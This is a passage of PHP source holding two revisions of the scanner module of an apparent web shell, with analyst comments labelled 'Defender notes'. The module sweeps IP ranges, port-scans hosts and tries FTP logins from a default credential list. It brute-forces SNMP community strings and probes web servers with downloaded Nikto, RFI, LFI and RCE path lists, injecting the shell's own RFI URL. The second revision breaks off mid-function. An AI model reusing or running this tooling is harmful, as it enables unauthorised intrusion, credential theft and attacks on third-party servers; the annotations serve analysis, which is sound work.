/**
 * Scanner page of the shell. Depending on which submit button is present in
 * $_REQUEST it runs one of three modes and streams the result as HTML:
 *   - portscanner:      TCP/UDP probe of one target over a port range;
 *   - securityscanner:  walks a.b.c.<f> .. a.b.c.<to> and, per host, optionally
 *                       does reverse DNS, a TCP port check, an HTTP banner grab,
 *                       Nikto-database path checks, an SMTP relay check, SNMP
 *                       community checks and FTP login attempts;
 *   - directoryscanner: wordlist-driven directory (HTTP) or subdomain (DNS)
 *                       discovery;
 * otherwise it prints the three HTML forms.
 *
 * Defender notes: every request field is trusted as-is. $target (href),
 * $f, $host, $port, $com, $userpass and $_SERVER["HTTP_HOST"] reach the
 * HTML output unescaped, as do the remote answers (PTR names, server
 * banners, Nikto description fields). Observable artifacts: a plain-HTTP
 * download of the Nikto 1.36 scan database into the temp directory under a
 * uniqid('BL') name (removed at the end of the run), and, after a successful
 * FTP login, a link whose query string carries the credentials.
 *
 * Helpers defined elsewhere in the shell: checkthisporT, whereistmP,
 * downloadiT, get_sw_namE, check_urL, checksmtP, snmpchecK, hlinK.
 */
function scanneR() {
    // HTML fragments shared with the other pages (presumably hidden fields / footer); defined elsewhere.
    global $hcwd, $et;
    // Default target shown in the forms: the server's own address.
    if (!empty($_SERVER['SERVER_ADDR'])) {
        $host = $_SERVER['SERVER_ADDR'];
    } else {
        $host = '127.0.0.1';
    }
    $udp = empty($_REQUEST['udp']) ? 0 : 1;
    $tcp = empty($_REQUEST['tcp']) ? 0 : 1;
    if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
        // ---- Port scanner ----
        // Only the numeric fields are cast; $target is used verbatim. It is escaped in the
        // heading below but not inside the telnet:// href.
        $target = $_REQUEST['target'];
        $from = (int) $_REQUEST['fromport'];
        $to = (int) $_REQUEST['toport'];
        $timeout = (int) $_REQUEST['timeout'];
        $nu = 0; // running count of open ports, used as the list number
        echo '<font color=blue>Port scanning started against ' . htmlspecialchars($target) . ':<br>';
        $start = time();
        for ($i = $from; $i <= $to; $i++) {
            if ($tcp) {
                if (checkthisporT($target, $i, $timeout)) {
                    $nu++;
                    $ser = '';
                    // Well-known service name from the local services table, if any.
                    if (getservbyport($i, 'tcp')) {
                        $ser = '(' . getservbyport($i, 'tcp') . ')';
                    }
                    echo "{$nu}) {$i} {$ser} (<a href='telnet://{$target}:{$i}'>Connect</a>) [TCP]<br>";
                }
            }
            if ($udp) {
                // Fourth argument (1) selects the UDP probe; the TCP calls omit it.
                if (checkthisporT($target, $i, $timeout, 1)) {
                    $nu++;
                    $ser = '';
                    if (getservbyport($i, 'udp')) {
                        $ser = '(' . getservbyport($i, 'udp') . ')';
                    }
                    echo "{$nu}) {$i} {$ser} [UDP]<br>";
                }
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
    } elseif (!empty($_REQUEST['securityscanner'])) {
        // ---- Security scanner over a /24: a.b.c.<f> up to a.b.c.<to> ----
        echo '<font color=blue>';
        $start = time();
        $from = $_REQUEST['from']; // "a.b.c.d" as typed; not validated or cast
        $to = (int) $_REQUEST['to'];
        $timeout = (int) $_REQUEST['timeout'];
        // Split at the last dot: $f = first host octet (string), $from = "a.b.c" prefix.
        $f = substr($from, strrpos($from, '.') + 1);
        $from = substr($from, 0, strrpos($from, '.'));
        if (!empty($_REQUEST['httpscanner'])) {
            // Network/host artifact: the Nikto 1.36 scan database is fetched over plain HTTP
            // and written to the temp dir under a uniqid('BL...') name; unlinked after the run.
            echo 'Loading webserver bug list...';
            $buglist = whereistmP() . DIRECTORY_SEPARATOR . uniqid('BL');
            $dl = downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
            if ($dl) {
                $file = file($buglist);
                echo 'Done! scanning started.<br><br>';
            } else {
                // $file stays unset, so the per-host Nikto block below is skipped; $buglist is
                // still set, so unlink() runs at the end whether or not the file was created.
                echo 'Failed!!! 
scanning started without webserver security testing...<br><br>';
            }
        } else {
            // Only the prefix is escaped here; $f comes from the request unescaped.
            $fr = htmlspecialchars($from);
            echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
        }
        for ($i = $f; $i <= $to; $i++) {
            $output = 0; // becomes 1 once anything was printed for this host (drives the <hr>)
            $ip = "{$from}.{$i}";
            if (!empty($_REQUEST['nslookup'])) {
                // Reverse DNS. The PTR answer is echoed unescaped, so the scanned host
                // controls this markup in the operator's browser.
                $hn = gethostbyaddr($ip);
                if ($hn != $ip) {
                    echo "{$ip} [{$hn}]<br>";
                }
                $output = 1;
            }
            if (!empty($_REQUEST['ipscanner'])) {
                // Comma-separated TCP port list from the request; entries are passed to the probe as-is.
                $port = $_REQUEST['port'];
                if (strstr($port, ',')) {
                    $p = explode(',', $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = '';
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout);
                    if ($scan) {
                        $ser = '';
                        // Assignment is intentional: service name, or false when unknown.
                        if ($ser = getservbyport($po, 'tcp')) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "{$ip}) Open ports:{$open}<br>";
                    $output = 1;
                }
            }
            if (!empty($_REQUEST['httpbanner'])) {
                // get_sw_namE: falsy when nothing answered, -1 when the software could not be
                // identified; otherwise the banner, which is echoed unescaped.
                $res = get_sw_namE($ip, $timeout);
                if ($res) {
                    echo "{$ip}) Webserver software: ";
                    if ($res == -1) {
                        echo 'Unknow';
                    } else {
                        echo $res;
                    }
                    echo '<br>';
                    $output = 1;
                }
            }
            if (!empty($_REQUEST['httpscanner'])) {
                // Only when port 80 answers and the Nikto database was loaded above.
                if (checkthisporT($ip, 80, $timeout) && !empty($file)) {
                    // Expansion lists for the Nikto placeholders @ADMINDIRS / @USERS / @NUKE / @CGIDIRS.
                    $admin = array('/admin/', '/adm/');
                    $users = array('adm', 'bin', 'daemon', 'ftp', 'guest', 'listen', 'lp', 'mysql', 'noaccess', 'nobody', 'nobody4', 'nuucp', 'operator', 'root', 'smmsp', 'smtp', 'sshd', 'sys', 'test', 'unknown', 'uucp', 'web', 'www');
                    $nuke = array('/', '/postnuke/', '/postnuke/html/', '/modules/', '/phpBB/', '/forum/');
                    $cgi = array('/cgi.cgi/', '/webcgi/', '/cgi-914/', '/cgi-915/', '/bin/', '/cgi/', '/mpcgi/', '/cgi-bin/', '/ows-bin/', '/cgi-sys/', '/cgi-local/', '/htbin/', '/cgibin/', '/cgis/', '/scripts/', '/cgi-win/', '/fcgi-bin/', '/cgi-exe/', '/cgi-home/', '/cgi-perl/');
                    foreach ($file as $v) {
                        $vuln = array();
                        $v = trim($v);
                        // Skip blank lines and '#' comments.
                        if (!$v || $v[0] == '#') {
                            continue;
                        }
                        // Rows are quoted CSV ("a","b",...): turn the separators into '^' and
                        // drop the quotes. A '^' inside a field would mis-split the row.
                        $v = str_replace('","', '^', $v);
                        $v = str_replace('"', '', $v);
                        $vuln = explode('^', $v);
                        // Field 1 is the request path. Fields 3 and 2 go to check_urL in the
                        // positions the directory scanner fills with 'GET' and '302' (method and
                        // expected status, presumably). Field 4 is the description, echoed unescaped.
                        $page = $cqich = $nukech = $adminch = $userch = $vuln[1];
                        // Only the first placeholder found is expanded (elseif chain); one request per substitution.
                        if (strstr($page, '@CGIDIRS')) {
                            foreach ($cgi as $cg) {
                                $cqich = str_replace('@CGIDIRS', 
$cg, $page);
                                $url = "http://{$ip}{$cqich}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } elseif (strstr($page, '@ADMINDIRS')) {
                            foreach ($admin as $cg) {
                                $adminch = str_replace('@ADMINDIRS', $cg, $page);
                                $url = "http://{$ip}{$adminch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } elseif (strstr($page, '@USERS')) {
                            foreach ($users as $cg) {
                                $userch = str_replace('@USERS', $cg, $page);
                                $url = "http://{$ip}{$userch}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } elseif (strstr($page, '@NUKE')) {
                            foreach ($nuke as $cg) {
                                $nukech = str_replace('@NUKE', $cg, $page);
                                $url = "http://{$ip}{$nukech}";
                                $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                                if ($res) {
                                    $output = 1;
                                    echo "{$ip})" . $vuln[4] . " <a href='{$url}' target='_blank'>{$url}</a><br>";
                                }
                            }
                        } else {
                            // No placeholder: request the path literally.
                            $url = "http://{$ip}{$page}";
                            $res = check_urL($url, $vuln[3], $vuln[2], $timeout);
                            if ($res) {
                                $output = 1;
                                echo "{$ip})" . $vuln[4] . 
" <a href='{$url}' target='_blank'>{$url}</a><br>";
                            }
                        }
                    }
                }
            }
            if (!empty($_REQUEST['smtprelay'])) {
                // Port 25 must answer; checksmtP returning exactly 1 is reported as an open relay.
                if (checkthisporT($ip, 25, $timeout)) {
                    $res = '';
                    $res = checksmtP($ip, $timeout);
                    if ($res == 1) {
                        echo "{$ip}) SMTP relay found.<br>";
                        $output = 1;
                    }
                }
            }
            if (!empty($_REQUEST['snmpscanner'])) {
                // UDP/161 must answer; every community string from the request is tried via snmpchecK.
                if (checkthisporT($ip, 161, $timeout, 1)) {
                    $com = $_REQUEST['com'];
                    $coms = $res = '';
                    if (strstr($com, ',')) {
                        $c = explode(',', $com);
                    } else {
                        $c[0] = $com;
                    }
                    foreach ($c as $v) {
                        $ret = snmpchecK($ip, $v, $timeout);
                        if ($ret) {
                            $coms .= " {$v} ";
                        }
                    }
                    if ($coms != '') {
                        echo "{$ip}) SNMP FOUND: {$coms}<br>";
                        $output = 1;
                    }
                }
            }
            if (!empty($_REQUEST['ftpscanner']) && function_exists('ftp_connect')) {
                if (checkthisporT($ip, 21, $timeout)) {
                    // "user:pass,user:pass" list from the request; the literal [BLANK] means an empty password.
                    $usps = explode(',', $_REQUEST['userpass']);
                    foreach ($usps as $v) {
                        $user = substr($v, 0, strpos($v, ':'));
                        $pass = substr($v, strpos($v, ':') + 1);
                        if ($pass == '[BLANK]') {
                            $pass = '';
                        }
                        // A fresh connection per credential pair; none of them is ftp_close()d.
                        $ftp = ftp_connect($ip, 21, $timeout);
                        if ($ftp) {
                            if (ftp_login($ftp, $user, $pass)) {
                                $output = 1;
                                // The working credentials are placed in the link's query string
                                // (useR=/pasS=), i.e. they end up in access logs, referrers and history.
                                echo "{$ip}) FTP FOUND: ({$user}:{$pass}) System type: " . ftp_systype($ftp) . " (<b><a href='";
                                echo hlinK("seC=ftpc&workingdiR=" . getcwd() . "&hosT={$ip}&useR={$user}&pasS={$pass}");
                                echo "' target='_blank'>Connect</a></b>)<br>";
                            }
                        }
                    }
                }
            }
            if ($output) {
                echo '<hr size=1 noshade>';
            }
        }
        $time = time() - $start;
        echo "Done! 
({$time} seconds)</font>";
        // Remove the downloaded Nikto database (set only when httpscanner was requested).
        if (!empty($buglist)) {
            unlink($buglist);
        }
    } elseif (!empty($_REQUEST['directoryscanner'])) {
        // ---- Directory / subdomain discoverer ----
        // The wordlist location comes straight from the request; file() accepts a local
        // path and, with allow_url_fopen enabled, a URL.
        $dir = file($_REQUEST['dic']);
        $host = $_REQUEST['host']; // target host, echoed into hrefs unescaped
        $r = $_REQUEST['r1'];      // truthy = directories over HTTP, else subdomains via DNS
        echo "<font color=blue><pre>Tahap Scanning Dimulai ...\n"; // Indonesian: "Scanning phase started ..."
        for ($i = 0; $i < count($dir); $i++) {
            $d = trim($dir[$i]);
            if ($r) {
                // A GET answered with 302 counts as "directory found".
                $adr = "http://{$host}/{$d}/";
                if (check_urL($adr, 'GET', '302')) {
                    echo "Directory Found: <a href='{$adr}' target='_blank'>{$adr}</a>\n";
                }
            } else {
                // gethostbyname() returns the name unchanged when it does not resolve.
                $adr = "{$d}.{$host}";
                $ip = gethostbyname($adr);
                if ($ip != $adr) {
                    echo "Subdomain Found: <a href='http://{$adr}' target='_blank'>{$adr}({$ip})</a>\n";
                }
            }
        }
        echo 'Done!</pre></font>';
    } else {
        // ---- No action requested: print the three forms ----
        $t = "<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'";
        // UDP is offered only when the sockets extension is loaded; otherwise tcp=1 is forced via a hidden field.
        $chbox = extension_loaded('sockets') ? "<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP" : "<input type=hidden name=tcp value=1>";
        // $host and $_SERVER["HTTP_HOST"] are inserted into value attributes without escaping.
        echo "<center>{$t}><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value={$host} size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>{$chbox}</td><td bgcolor='#808080' align='right'>{$hcwd}<input type=submit class=buttons name=portscanner value=Scan></form>{$et}{$t}><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='" . 
$_SERVER["HTTP_HOST"] . "' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>";
        // Keep the "a.b.c" prefix of the server address to prefill the range form.
        $host = substr($host, 0, strrpos($host, "."));
        echo "{$t} name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value={$host}.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>{$hcwd}</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning <input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td 
width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked style='border-width:1px;background-color:#808080;'>SNMP:</td><td bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH\$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>{$et}";
    }
}
/**
 * Scanner page, later revision. Same three modes as the older variant
 * (portscanner / securityscanner / directoryscanner, else the forms), with
 * these differences visible in the code: the security scanner takes an
 * arbitrary IP range (ip2long/long2ip) instead of one /24, adds ping and
 * traceroute through shelL(), a UDP port list, and separate Directory /
 * Files / RFI / LFI / RCE path databases; output is flushed progressively
 * with @flush_buffers().
 *
 * Defender notes: the request fields are trusted as-is and $to, $host,
 * $_SERVER["HTTP_HOST"] and the remote answers (PTR names, ping/traceroute
 * output) are echoed unescaped. Host artifacts: the path databases are
 * fetched from $Resource_Dir . "scan_db/<db>.txt" and cached in the temp
 * directory as Directory.pj, Files.pj, RFI.pj, LFI.pj and RCE.pj; this
 * revision never deletes them. Network artifacts: the RFI probe replaces
 * %RFI% with the shell's $RFI_URL and looks for the string 'NetJackal' in
 * the reply; LFI/RCE probes look for 'root:'. On a successful FTP login the
 * printed link carries the credentials in its query string.
 *
 * Helpers defined elsewhere in the shell: checkthisporT, whereistmP,
 * downloadiT, flush_buffers, shelL, get_sw_namE, check_urL, getiT,
 * checksmtP, snmpchecK, ftpchecK, checkfunctioN, hlinK.
 */
function scanneR() {
    // $windows selects the command syntax for ping/traceroute; $Resource_Dir / $RFI_URL
    // are the shell's remote resource base and RFI marker URL; $hcwd is shared form markup.
    global $windows, $hcwd, $Resource_Dir, $RFI_URL;
    // Default target shown in the forms: the server's own address.
    if (!empty($_SERVER['SERVER_ADDR'])) {
        $host = $_SERVER['SERVER_ADDR'];
    } else {
        $host = '127.0.0.1';
    }
    $udp = empty($_REQUEST['udp']) ? 0 : 1;
    $tcp = empty($_REQUEST['tcp']) ? 0 : 1;
    if (($udp || $tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])) {
        // ---- Port scanner ----
        // Numeric fields are cast; $target is used verbatim (escaped in the heading, not in the href).
        $target = $_REQUEST['target'];
        $from = (int) $_REQUEST['fromport'];
        $to = (int) $_REQUEST['toport'];
        $timeout = (int) $_REQUEST['timeout'];
        $nu = 0; // running count of open ports, used as the list number
        echo '<font color=#FA0>Port scanning started against ' . htmlspecialchars($target) . ':<br />';
        $start = time();
        for ($i = $from; $i <= $to; $i++) {
            if ($tcp) {
                if (checkthisporT($target, $i, $timeout)) {
                    $nu++;
                    $ser = '';
                    if (getservbyport($i, 'tcp')) {
                        $ser = '(' . getservbyport($i, 'tcp') . ')';
                    }
                    echo "{$nu}) {$i} {$ser} (<a href='telnet://{$target}:{$i}'>Connect</a>) [TCP]<br>";
                }
            }
            if ($udp) {
                // Fourth argument (1) selects the UDP probe.
                if (checkthisporT($target, $i, $timeout, 1)) {
                    $nu++;
                    $ser = '';
                    if (getservbyport($i, 'udp')) {
                        $ser = '(' . getservbyport($i, 'udp') . ')';
                    }
                    echo "{$nu}) {$i} {$ser} [UDP]<br>";
                }
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</font>";
    } elseif (!empty($_REQUEST['securityscanner'])) {
        // ---- Security scanner over an arbitrary IP range ----
        echo '<font color=#FA0><pre>';
        $start = time();
        $from = $_REQUEST['from'];
        $to = $_REQUEST['to'];
        // The only range check is "start after end". ip2long() yields false for a malformed
        // address, and false > false is not true, so malformed input passes; there is no cap
        // on the range size either.
        $fIP = ip2long($from);
        $tIP = ip2long($to);
        if ($fIP > $tIP) {
            echo 'Invalid range!</pre></font>';
            return 0;
        }
        $timeout = (int) $_REQUEST['timeout'];
        if (!empty($_REQUEST['httpscanner'])) {
            // Load the five path databases; each is cached in the temp dir as "<db>.pj" and
            // only downloaded when the cached copy is missing. Nothing removes them later.
            echo 'Loading web-server vulnerability DBs...<br />';
            @flush_buffers();
            $DBs = array('Directory', 'Files', 'RFI', 'LFI', 'RCE');
            $file = array();
            foreach ($DBs as $db) {
                $buglist = whereistmP() . DIRECTORY_SEPARATOR . "{$db}.pj";
                $dl = !file_exists($buglist) ? downloadiT($Resource_Dir . 
"scan_db/{$db}.txt", $buglist) : true;
                if ($dl) {
                    $file[$db] = file($buglist);
                    echo "'{$db}' database Loaded.<br />";
                } else {
                    echo "Can not load '{$db}' database.<br />";
                }
                @flush_buffers();
            }
        }
        // $from is escaped, $to is not.
        $fr = htmlspecialchars($from);
        echo "<br />Scanning {$fr}-{$to}:<br />";
        for ($i = $fIP; $i <= $tIP; $i++) {
            $ip = long2ip($i);
            echo "<br /><br />---------------- {$ip} ----------------<br />";
            if (!empty($_REQUEST['nslookup'])) {
                // Reverse DNS; the PTR answer is echoed unescaped (controlled by the scanned host).
                $hn = gethostbyaddr($ip);
                if ($hn != $ip) {
                    echo "-- Hostname: {$hn}<br />";
                }
            }
            @flush_buffers();
            if (!empty($_REQUEST['ping'])) {
                // One ICMP echo through the system shell. $ip is long2ip() output and $timeout an
                // int, so no request text reaches the command line here. The raw tool output is
                // echoed; a host without a reply is skipped entirely (continue).
                echo "-- Ping:<br />";
                $pres = !$windows ? shelL("ping -c 1 -W {$timeout} {$ip}") : shelL("ping -n 1 -w {$timeout} {$ip}");
                if (strstr($pres, 'Received = 0') || strstr($pres, '0 received')) {
                    echo "Ping timeout!<br />";
                    continue;
                } else {
                    echo '<font color="#E9CFEC">' . $pres . '</font><br />';
                }
                @flush_buffers();
            }
            if (!empty($_REQUEST['tracert'])) {
                // traceroute/tracert through the system shell, same argument sources as above.
                echo "-- Traceroute:<br />";
                $tres = !$windows ? shelL("traceroute -w {$timeout} {$ip}") : shelL("tracert -w {$timeout} {$ip}");
                echo '<font color="#E9CFEC">' . $tres . 
'</font><br />';
                @flush_buffers();
            }
            if (!empty($_REQUEST['tcppscanner'])) {
                // Comma-separated TCP port list from the request.
                $port = $_REQUEST['port'];
                if (strstr($port, ',')) {
                    $p = explode(',', $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = '';
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout);
                    if ($scan) {
                        $ser = '';
                        // Assignment is intentional: service name, or false when unknown.
                        if ($ser = getservbyport($po, 'tcp')) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "-- TCP open ports:{$open}<br />";
                    @flush_buffers();
                }
            }
            if (!empty($_REQUEST['udppscanner'])) {
                // Comma-separated UDP port list. Note the service name is still looked up in
                // the 'tcp' table here.
                $port = $_REQUEST['udport'];
                if (strstr($port, ',')) {
                    $p = explode(',', $port);
                } else {
                    $p[0] = $port;
                }
                $open = $ser = '';
                foreach ($p as $po) {
                    $scan = checkthisporT($ip, $po, $timeout, 1);
                    if ($scan) {
                        $ser = '';
                        if ($ser = getservbyport($po, 'tcp')) {
                            $ser = "({$ser})";
                        }
                        $open .= " {$po}{$ser} ";
                    }
                }
                if ($open) {
                    echo "-- UDP open ports:{$open}<br>";
                    @flush_buffers();
                }
            }
            if (!empty($_REQUEST['httpbanner'])) {
                // The inner test repeats the outer one, so this branch always prints 'Unknow'
                // and never the banner; the older revision compared against -1 here.
                $res = get_sw_namE($ip, $timeout);
                if ($res) {
                    echo "-- Webserver software: ";
                    if ($res) {
                        echo 'Unknow';
                    } else {
                        echo $res;
                    }
                    echo '<br />';
                    @flush_buffers();
                }
            }
            if (!empty($_REQUEST['httpscanner'])) {
                echo "-- Webserver security:<br />";
                // Requires port 80 open, the databases loaded, and a random uniqid('TEST_') path
                // NOT answering 200/301/302/403 — presumably to skip servers that answer every
                // path, which would make every entry below a false positive.
                if (checkthisporT($ip, 80, $timeout) && !empty($file) && !check_urL('http://' . $ip . '/' . uniqid('TEST_'), 'GET', '200 301 302 403', $timeout)) {
                    // Directory and Files entries: one GET per line; the status returned by check_urL is printed.
                    echo "Directory scan:<br />";
                    foreach ($file['Directory'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $res = check_urL('http://' . $ip . '/' . $v, 'GET', '200 301 302 403', $timeout);
                        if ($res) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a> ({$res})<br />";
                        }
                    }
                    echo "File scan:<br />";
                    foreach ($file['Files'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $res = check_urL('http://' . $ip . '/' . 
$v, 'GET', '200 301 302 403', $timeout);
                        if ($res) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a> ({$res})<br />";
                        }
                    }
                    // RFI / RCE / LFI entries: %RFI% is replaced by the shell's $RFI_URL and the
                    // reply body is searched for a marker ('NetJackal' for RFI, 'root:' for the
                    // other two). $headers is not defined before these calls — presumably a
                    // by-reference output parameter of getiT; confirm against its definition.
                    echo "RFI scan:<br />";
                    foreach ($file['RFI'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $v = str_replace('%RFI%', $RFI_URL, $v);
                        if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'NetJackal')) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
                        }
                    }
                    echo "RCE scan:<br />";
                    foreach ($file['RCE'] as $k => $v) {
                        $v = trim($v);
                        $v = str_replace('%RFI%', $RFI_URL, $v);
                        if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'root:')) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
                        }
                    }
                    echo "LFI scan:<br />";
                    foreach ($file['LFI'] as $k => $v) {
                        @flush_buffers();
                        $v = trim($v);
                        $v = str_replace('%RFI%', $RFI_URL, $v);
                        if (strstr(getiT('http://' . $ip . '/' . $v, $headers), 'root:')) {
                            echo "<a href='http://{$ip}/{$v}' target='_blank'>http://{$ip}/{$v}</a><br />";
                        }
                    }
                }
            }
            if (!empty($_REQUEST['smtprelay'])) {
                // Port 25 must answer; checksmtP returning exactly 1 is reported as an open relay.
                if (checkthisporT($ip, 25, $timeout)) {
                    $res = '';
                    $res = checksmtP($ip, $timeout);
                    if ($res == 1) {
                        echo "-- SMTP relay found.<br />";
                        @flush_buffers();
                    }
                }
            }
            if (!empty($_REQUEST['snmpscanner'])) {
                // UDP/161 must answer; every community string from the request is tried via snmpchecK.
                if (checkthisporT($ip, 161, $timeout, 1)) {
                    $com = $_REQUEST['com'];
                    $coms = $res = '';
                    if (strstr($com, ',')) {
                        $c = explode(',', $com);
                    } else {
                        $c[0] = $com;
                    }
                    foreach ($c as $v) {
                        $ret = snmpchecK($ip, $v, $timeout);
                        if ($ret) {
                            $coms .= " {$v} ";
                        }
                    }
                    if ($coms != '') {
                        echo "-- SNMP FOUND: {$coms}<br />";
                        @flush_buffers();
                    }
                }
            }
            if (!empty($_REQUEST['ftpscanner']) && checkfunctioN('ftp_connect')) {
                if (checkthisporT($ip, 21, $timeout)) {
                    // "user:pass,user:pass" list from the request; the literal [BLANK] means an empty password.
                    $usps = explode(',', $_REQUEST['userpass']);
                    foreach ($usps as $v) {
                        $user = substr($v, 0, strpos($v, ':'));
                        $pass = substr($v, strpos($v, ':') + 1);
                        if ($pass == '[BLANK]') {
                            $pass = '';
                        }
                        if (ftpchecK($ip, $user, $pass, $timeout)) {
                            // Working credentials go into the link's query string (useR=/pasS=),
                            // i.e. into access logs, referrers and browser history.
                            echo "-- FTP FOUND: ({$user}:{$pass}) (<b><a href='";
                            echo 
hlinK("seC=ftpc&workingdiR=" . getcwd() . "&hosT={$ip}&useR={$user}&pasS={$pass}");
                            echo "' target='_blank'>Connect</a></b>)<br />";
                            @flush_buffers();
                        }
                    }
                }
            }
        }
        $time = time() - $start;
        echo "Done! ({$time} seconds)</pre></font>";
    } elseif (!empty($_REQUEST['directoryscanner'])) {
        // ---- Directory / subdomain discoverer ----
        // The wordlist location comes straight from the request; file() accepts a local
        // path and, with allow_url_fopen enabled, a URL.
        $dir = file($_REQUEST['dic']);
        $host = $_REQUEST['host']; // target host, echoed into hrefs unescaped
        $r = $_REQUEST['r1'];      // truthy = directories over HTTP, else subdomains via DNS
        echo "<font color=#FA0><pre>Scanning started...\n";
        for ($i = 0; $i < count($dir); $i++) {
            $d = trim($dir[$i]);
            if ($r) {
                // No expected status is passed here, so check_urL's own default applies.
                $adr = "http://{$host}/{$d}/";
                if (check_urL($adr, 'GET')) {
                    echo "Directory Found: <a href='{$adr}' target='_blank'>{$adr}</a>\n";
                }
            } else {
                // gethostbyname() returns the name unchanged when it does not resolve.
                $adr = "{$d}.{$host}";
                $ip = gethostbyname($adr);
                if ($ip != $adr) {
                    echo "Subdomain Found: <a href='http://{$adr}' target='_blank'>{$adr}({$ip})</a>\n";
                }
            }
        }
        echo 'Done!</pre></font>';
